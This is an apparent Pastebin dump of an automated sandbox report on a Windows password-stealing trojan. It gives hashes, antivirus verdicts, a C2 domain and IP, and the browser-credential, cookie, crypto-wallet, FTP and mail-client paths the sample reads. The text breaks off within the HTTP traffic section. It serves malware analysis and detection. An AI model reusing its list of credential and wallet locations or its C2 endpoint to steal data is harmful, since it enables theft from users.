Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- [*] MalFamily: "Coins"
- [*] MalScore: 10.0
- [*] File Name: "Exes_3341801064e37eef15b680bb4e7aa90e.exe"
- [*] File Size: 114688
- [*] File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- [*] SHA256: "8273d33b457a58460b747fb1b25c085108228729667ece091f2d0bef5b193221"
- [*] MD5: "3341801064e37eef15b680bb4e7aa90e"
- [*] SHA1: "abef4de04105268313e8039e0eb2ccb60a21a352"
- [*] SHA512: "cbdf5b45ed94f6ba1ab69cf803eff33de9b4a9074ae8ff9bd73ae452a45ccbd55d97e02303e92d6e82bdc8a613ae16cee2d938bfce5bda68e612ccb75f259d4d"
- [*] CRC32: "2097B030"
- [*] SSDEEP: "3072:KExRaX6raoCoCyz6/mqv1JR+yBtGOeaeWgiRq:faZ1tme++wig"
- [*] Process Execution: [
- "Exes_3341801064e37eef15b680bb4e7aa90e.exe",
- "services.exe"
- ]
- [*] Signatures Detected: [
- {
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details": [
- {
- "post_no_referer": "HTTP traffic contains a POST request with no referer header"
- },
- {
- "suspicious_request": "http://viewmanage101.tk/webaz.php"
- },
- {
- "suspicious_request": "http://ip-api.com/json"
- }
- ]
- },
- {
- "Description": "Performs some HTTP requests",
- "Details": [
- {
- "url": "http://viewmanage101.tk/webaz.php"
- },
- {
- "url": "http://ip-api.com/json"
- }
- ]
- },
- {
- "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
- "Details": [
- {
- "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 16552921 times"
- }
- ]
- },
- {
- "Description": "Steals private information from local Internet browsers",
- "Details": [
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@doubleclick[1].txt"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@advertising[1].txt"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected][2].txt"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@media[2].txt"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected][1].txt"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google[5].txt"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google[4].txt"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google[3].txt"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google[1].txt"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected][2].txt"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@msn[1].txt"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected][2].txt"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@3lift[1].txt"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@bing[2].txt"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@scorecardresearch[2].txt"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@atwola[2].txt"
- }
- ]
- },
- {
- "Description": "Collects information about installed applications",
- "Details": [
- {
- "Program": "Google Update Helper"
- },
- {
- },
- {
- "Program": "Microsoft Excel MUI 2013"
- },
- {
- "Program": "Microsoft Outlook MUI 2013"
- },
- {
- },
- {
- "Program": "Google Chrome"
- },
- {
- "Program": "Adobe Flash Player 29 NPAPI"
- },
- {
- "Program": "Adobe Flash Player 29 ActiveX"
- },
- {
- "Program": "Microsoft DCF MUI 2013"
- },
- {
- "Program": "Microsoft Access MUI 2013"
- },
- {
- "Program": "Microsoft Office Proofing Tools 2013 - English"
- },
- {
- "Program": "Adobe Acrobat Reader DC"
- },
- {
- "Program": "Microsoft Publisher MUI 2013"
- },
- {
- "Program": "Microsoft Office Shared MUI 2013"
- },
- {
- "Program": "Microsoft Office OSM MUI 2013"
- },
- {
- "Program": "Microsoft InfoPath MUI 2013"
- },
- {
- "Program": "Microsoft Office Shared Setup Metadata MUI 2013"
- },
- {
- "Program": "Outils de v\\xc3\\xa9rification linguistique 2013 de Microsoft Office\\xc2\\xa0- Fran\\xc3\\xa7ais"
- },
- {
- "Program": "Microsoft Word MUI 2013"
- },
- {
- "Program": "Microsoft OneDrive"
- },
- {
- "Program": "Microsoft Groove MUI 2013"
- },
- {
- "Program": "Microsoft Office Proofing Tools 2013 - Espa\\xc3\\xb1ol"
- },
- {
- },
- {
- "Program": "Microsoft Access Setup Metadata MUI 2013"
- },
- {
- "Program": "Microsoft Office OSM UX MUI 2013"
- },
- {
- "Program": "Java Auto Updater"
- },
- {
- "Program": "Microsoft PowerPoint MUI 2013"
- },
- {
- "Program": "Microsoft Office Professional Plus 2013"
- },
- {
- "Program": "Adobe Refresh Manager"
- },
- {
- "Program": "Microsoft Office Proofing 2013"
- },
- {
- "Program": "Microsoft Lync MUI 2013"
- },
- {
- },
- {
- "Program": "Microsoft OneNote MUI 2013"
- }
- ]
- },
- {
- "Description": "File has been identified by 62 Antiviruses on VirusTotal as malicious",
- "Details": [
- {
- "MicroWorld-eScan": "Trojan.GenericKD.32002590"
- },
- {
- "FireEye": "Generic.mg.3341801064e37eef"
- },
- {
- "CAT-QuickHeal": "Trojan.GenericPMF.S4165517"
- },
- {
- "McAfee": "GenericRXGZ-WP!3341801064E3"
- },
- {
- "Malwarebytes": "Trojan.PasswordStealer"
- },
- {
- "Zillya": "Trojan.Azorult.Win32.4"
- },
- {
- "SUPERAntiSpyware": "Trojan.Agent/Gen-Downloader"
- },
- {
- "Alibaba": "TrojanPSW:Win32/Coins.0dfe32d4"
- },
- {
- "K7GW": "Password-Stealer ( 0052f96e1 )"
- },
- {
- "K7AntiVirus": "Password-Stealer ( 0052f96e1 )"
- },
- {
- "Arcabit": "Trojan.Generic.D1E8521E"
- },
- {
- "TrendMicro": "TrojanSpy.Win32.COINSTEAL.SMPIS"
- },
- {
- "F-Prot": "W32/Injector.HKR"
- },
- {
- "Symantec": "ML.Attribute.HighConfidence"
- },
- {
- "APEX": "Malicious"
- },
- {
- "Avast": "Win32:Trojan-gen"
- },
- {
- "ClamAV": "Win.Malware.Delf-6957976-0"
- },
- {
- "Kaspersky": "Trojan-PSW.Win32.Coins.nav"
- },
- {
- "BitDefender": "Trojan.GenericKD.32002590"
- },
- {
- "NANO-Antivirus": "Trojan.Win32.Stealer.fitdqk"
- },
- {
- "Paloalto": "generic.ml"
- },
- {
- "AegisLab": "Trojan.Win32.Coins.4!c"
- },
- {
- "Rising": "Stealer.AZORult!1.B7AE (CLOUD)"
- },
- {
- "Ad-Aware": "Trojan.GenericKD.32002590"
- },
- {
- "Sophos": "Troj/PWS-CJR"
- },
- {
- "Comodo": "Malware@#37x6tl7ocjkym"
- },
- {
- "F-Secure": "Trojan.TR/Crypt.XPACK.Gen"
- },
- {
- "DrWeb": "Trojan.PWS.Stealer.24943"
- },
- {
- "VIPRE": "Trojan.Win32.Generic!BT"
- },
- {
- "Invincea": "heuristic"
- },
- {
- "McAfee-GW-Edition": "BehavesLike.Win32.Backdoor.ch"
- },
- {
- "Trapmine": "malicious.high.ml.score"
- },
- {
- "Emsisoft": "Trojan.GenericKD.32002590 (B)"
- },
- {
- "SentinelOne": "DFI - Suspicious PE"
- },
- {
- "Cyren": "W32/Injector.WKRP-0828"
- },
- {
- "Jiangmin": "Trojan.PSW.Coins.cvx"
- },
- {
- "Webroot": "W32.Tojan.Azorult"
- },
- {
- "Avira": "TR/Crypt.XPACK.Gen"
- },
- {
- "Antiy-AVL": "Trojan[Ransom]/Win32.Blocker"
- },
- {
- "Microsoft": "Trojan:Win32/Gandcrab!rfn"
- },
- {
- "Endgame": "malicious (high confidence)"
- },
- {
- "ViRobot": "Trojan.Win32.Z.Pws.114688.AU"
- },
- {
- "ZoneAlarm": "Trojan-PSW.Win32.Coins.nav"
- },
- {
- "GData": "Trojan.GenericKD.32002590"
- },
- {
- "TACHYON": "Trojan/W32.DP-Agent.114688.Q"
- },
- {
- "AhnLab-V3": "Trojan/Win32.Delf.R260844"
- },
- {
- "Acronis": "suspicious"
- },
- {
- "VBA32": "TrojanSpy.Stealer"
- },
- {
- "ALYac": "Spyware.Infostealer.Delf.gen"
- },
- {
- "MAX": "malware (ai score=100)"
- },
- {
- "Cylance": "Unsafe"
- },
- {
- "ESET-NOD32": "a variant of Win32/PSW.Delf.OSF"
- },
- {
- "TrendMicro-HouseCall": "TrojanSpy.Win32.COINSTEAL.SMPIS"
- },
- {
- "Tencent": "Win32.Trojan-qqpass.Qqrob.Lhmv"
- },
- {
- "Yandex": "Trojan.PWS.Coins!"
- },
- {
- "Ikarus": "Trojan-PSW.Delf"
- },
- {
- "Fortinet": "W32/PSW.DELF.OSF!tr"
- },
- {
- "AVG": "Win32:Trojan-gen"
- },
- {
- "Cybereason": "malicious.064e37"
- },
- {
- "Panda": "Trj/Genetic.gen"
- },
- {
- "CrowdStrike": "win/malicious_confidence_100% (W)"
- },
- {
- "Qihoo-360": "Win32/Trojan.PWS.51a"
- }
- ]
- },
- {
- "Description": "Checks the CPU name from registry, possibly for anti-virtualization",
- "Details": []
- },
- {
- "Description": "Attempts to access Bitcoin/ALTCoin wallets",
- "Details": [
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Sun\\wallets\\wallet.dat"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Adobe\\wallets\\wallet.dat"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Adobe\\wallet.dat"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Notepad++\\wallets\\wallet.dat"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Sun\\wallet.dat"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\wallets\\wallet.dat"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\wallets\\wallet.dat"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Identities\\wallets\\wallet.dat"
- },
- {
- "file": "C:\\Users\\user\\AppData\\wallets\\wallet.dat"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Macromedia\\wallet.dat"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Macromedia\\wallets\\wallet.dat"
- },
- {
- "file": "C:\\Users\\user\\AppData\\wallet.dat"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\wallet.dat"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Notepad++\\wallet.dat"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\wallet.dat"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Identities\\wallet.dat"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\*"
- }
- ]
- },
- {
- "Description": "Harvests credentials from local FTP client softwares",
- "Details": [
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\filezilla\\recentservers.xml"
- }
- ]
- },
- {
- "Description": "Harvests information related to installed instant messenger clients",
- "Details": [
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
- }
- ]
- },
- {
- "Description": "Harvests information related to installed mail clients",
- "Details": [
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Email"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Email"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002"
- }
- ]
- },
- {
- "Description": "Collects information to fingerprint the system",
- "Details": []
- },
- {
- "Description": "Anomalous binary characteristics",
- "Details": [
- {
- "anomaly": "Timestamp on binary predates the release date of the OS version it requires by at least a year"
- }
- ]
- },
- {
- "Description": "Created network traffic indicative of malicious activity",
- "Details": [
- {
- "signature": "ET DNS Query to a .tk domain - Likely Hostile"
- },
- {
- "signature": "ET TROJAN Generic - POST To .php w/Extended ASCII Characters (Likely Zeus Derivative)"
- }
- ]
- }
- ]
- [*] Started Service: [
- "VaultSvc"
- ]
- [*] Executed Commands: [
- "C:\\Windows\\system32\\lsass.exe"
- ]
- [*] Mutexes: [
- "A81FB8C60-BBE6E186-FC9B5DB5-36DA4559-33946726"
- ]
- [*] Modified Files: [
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-console-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-datetime-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-debug-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-errorhandling-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-2-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l2-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-handle-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-heap-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-interlocked-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-libraryloader-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-localization-l1-2-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-memory-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-namedpipe-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processenvironment-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-1.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-profile-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-rtlsupport-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-string-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-2-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-sysinfo-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-timezone-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-util-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-conio-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-convert-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-environment-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-filesystem-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-heap-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-locale-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-math-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-multibyte-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-private-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-process-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-runtime-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-stdio-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-string-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-time-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-utility-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\freebl3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\mozglue.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\msvcp140.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nss3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nssdbm3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\softokn3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\ucrtbase.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\vcruntime140.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\198216563126896214581903.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\19872921650540215538922.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\198729685879913544435363.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\198730006917777387454284.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\198730467440815053199980.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\curbuf.dat"
- ]
- [*] Deleted Files: [
- "C:\\Users\\user\\AppData\\Local\\Temp\\198216563126896214581903.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\19872921650540215538922.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\198729685879913544435363.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\198730006917777387454284.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\198730467440815053199980.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\curbuf.dat",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-console-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-datetime-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-debug-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-errorhandling-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-2-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l2-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-handle-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-heap-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-interlocked-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-libraryloader-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-localization-l1-2-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-memory-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-namedpipe-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processenvironment-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-1.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-profile-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-rtlsupport-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-string-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-2-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-sysinfo-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-timezone-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-util-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-conio-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-convert-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-environment-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-filesystem-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-heap-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-locale-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-math-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-multibyte-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-private-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-process-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-runtime-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-stdio-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-string-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-time-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-utility-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\freebl3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\mozglue.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\msvcp140.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nss3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nssdbm3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\softokn3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\ucrtbase.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\vcruntime140.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\"
- ]
- [*] Modified Registry Keys: []
- [*] Deleted Registry Keys: []
- [*] DNS Communications: [
- {
- "type": "A",
- "request": "viewmanage101.tk",
- "answers": [
- {
- "data": "91.235.129.160",
- "type": "A"
- }
- ]
- },
- {
- "type": "A",
- "request": "ip-api.com",
- "answers": [
- {
- "data": "72.11.140.50",
- "type": "A"
- },
- {
- "data": "66.212.29.250",
- "type": "A"
- }
- ]
- }
- ]
- [*] Domains: [
- {
- "ip": "91.235.129.160",
- "domain": "viewmanage101.tk"
- },
- {
- "ip": "66.212.29.250",
- "domain": "ip-api.com"
- }
- ]
- [*] Network Communication - ICMP: []
- [*] Network Communication - HTTP: [
- {
- "count": 1,
- "body": "\\x00\\x00\\x00&f\\x96&f\\x9fE\\x17\\x8b0m\\xed&f\\x98&f\\x9e&g\\xeaA\\x17\\xeb&f\\x98Fp\\x9d2p\\x9d;p\\x9d5p\\x9cG\\x13\\xed&f\\x97Ap\\x9d6\\x11\\xec&f\\x9b&g\\xea&f\\x9d&f\\x98G\\x14\\x8b0a\\x8b0`\\x8b0`\\x8b0l\\x8b1\\x11\\x8b0f\\x8b0f\\x8b0l\\x8b0a\\x8b0c\\x8b0b\\x8b0g\\x8b0c",
- "uri": "http://viewmanage101.tk/webaz.php",
